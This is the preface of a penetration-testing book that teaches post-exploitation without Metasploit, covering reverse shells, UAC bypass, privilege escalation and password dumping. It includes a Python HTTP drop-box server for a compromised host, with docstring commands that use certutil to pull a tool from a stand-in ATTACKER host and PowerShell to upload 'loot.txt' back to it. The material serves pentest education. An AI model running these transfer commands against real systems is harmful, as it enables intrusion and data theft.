This book is an introduction for readers who know how to use Metasploit but do not know what happens behind the scenes.

If you are unsure whether it is for you, see whether any of the following questions stumps you. If one does, this book is for you.

  • How do you use publicly available exploits?
  • How do you customize a public exploit for your specific needs?
  • What would you do if the Metasploit Framework did not exist?
  • How do you bypass UAC on Windows 7 without Metasploit?
  • How do you escalate from a standard user or administrator to SYSTEM without “getsystem”?
  • How do you upload files to a target machine without Meterpreter?
  • How do you download files from a target machine without Meterpreter?
  • How do you dump passwords from a target machine without Meterpreter?
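
The two file-transfer questions are a good illustration of what “without Meterpreter” means in practice: Meterpreter’s upload and download commands are a convenience over channels the target already has. The following is an added example, not code from this book: the attacker-side half of a plain-HTTP file drop, written in Python. The target-side commands in the module docstring are assumed Windows built-ins (certutil for pulling a file down, PowerShell’s WebClient for pushing one back) and are not taken from the book’s scenarios. The server is deliberately unauthenticated, so the one check worth keeping is the file-name sanitization, which stops a request such as `PUT /../../Windows/tool.exe` from writing outside the drop directory.

```python
"""Attacker-side HTTP drop box: move files to and from a compromised host using
only the target's built-in HTTP clients, with no Meterpreter upload/download.

Added example for this preface, not the book's own code. Assumed target-side
commands (Windows built-ins, one per direction, ATTACKER = this machine's IP):
  download to target:
    certutil -urlcache -split -f http://ATTACKER:8000/tool.exe tool.exe
  upload from target:
    powershell -c "(New-Object Net.WebClient).UploadFile('http://ATTACKER:8000/loot.txt','PUT','loot.txt')"
"""
import os
import posixpath
from http.server import BaseHTTPRequestHandler, HTTPServer


def safe_name(raw_path):
    """Reduce a request path to a bare file name inside the drop directory.

    Returns the file name, or None if the path does not name a single file
    (e.g. '/../etc/passwd' or '/a/b'). Traversal segments are collapsed by
    normpath before the check, so '/../../x' simply becomes 'x'.
    """
    name = posixpath.normpath(raw_path.split("?", 1)[0]).lstrip("/")
    if not name or "/" in name or "\\" in name or name in (".", ".."):
        return None
    return name


class DropBoxHandler(BaseHTTPRequestHandler):
    """GET serves a file out of `directory`; PUT stores the request body there."""

    directory = "."  # overridden per server by make_server()

    def do_GET(self):
        name = safe_name(self.path)
        path = os.path.join(self.directory, name) if name else None
        if not path or not os.path.isfile(path):
            self.send_error(404)
            return
        with open(path, "rb") as f:
            data = f.read()
        self.send_response(200)
        self.send_header("Content-Type", "application/octet-stream")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        name = safe_name(self.path)
        if not name:
            self.send_error(400, "bad file name")
            return
        length = int(self.headers.get("Content-Length", "0"))
        data = self.rfile.read(length)
        with open(os.path.join(self.directory, name), "wb") as f:
            f.write(data)
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        # Print one line per transfer instead of the default access-log format.
        print("%s %s from %s" % (self.command, self.path, self.client_address[0]))


def make_server(directory, port=0, host="127.0.0.1"):
    """Bind a drop box on host:port (port 0 = any free port) without starting it.

    The caller runs serve_forever(), either directly or in a thread. Bind to a
    loopback or VPN address: anyone who can reach the port can read and write
    the whole directory.
    """
    handler = type("BoundDropBox", (DropBoxHandler,), {"directory": directory})
    return HTTPServer((host, port), handler)


if __name__ == "__main__":
    server = make_server(os.getcwd(), 8000)
    print("drop box on http://%s:%d/ serving %s" % (*server.server_address, os.getcwd()))
    server.serve_forever()
```

Run it from the directory holding the tools you want to push, and tear it down as soon as the transfer is done; with no authentication, leaving it listening is a second foothold for anyone else on the network.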

There are many tutorials on the Internet showing how to use Metasploit and its Meterpreter payload for penetration testing. Meterpreter is a payload in the Metasploit Framework that is commonly used for post exploitation, and it is popular for capabilities such as escalating privileges from a standard or administrative user to SYSTEM and dumping password hashes. The best part is that each of these takes only a few commands.

Many people do not understand how these techniques are actually implemented, and that understanding is a crucial part of learning penetration testing. Although most of the techniques are covered here and there, I seldom see a place where they are put together to show how they can be chained into a successful attack.

This book is an attempt to fill that gap by demonstrating penetration testing concepts without automated tools such as Metasploit and Meterpreter. We will cover gaining reverse shells, searching for publicly available exploits and customizing them to our needs, escalating privileges, and dumping passwords, all from nothing more than a low-privileged remote shell. The focus is on post exploitation.

Note: the exact techniques shown here may differ on other platforms and versions. The idea is to show a methodology that can be followed, and it is explained using two specific scenarios.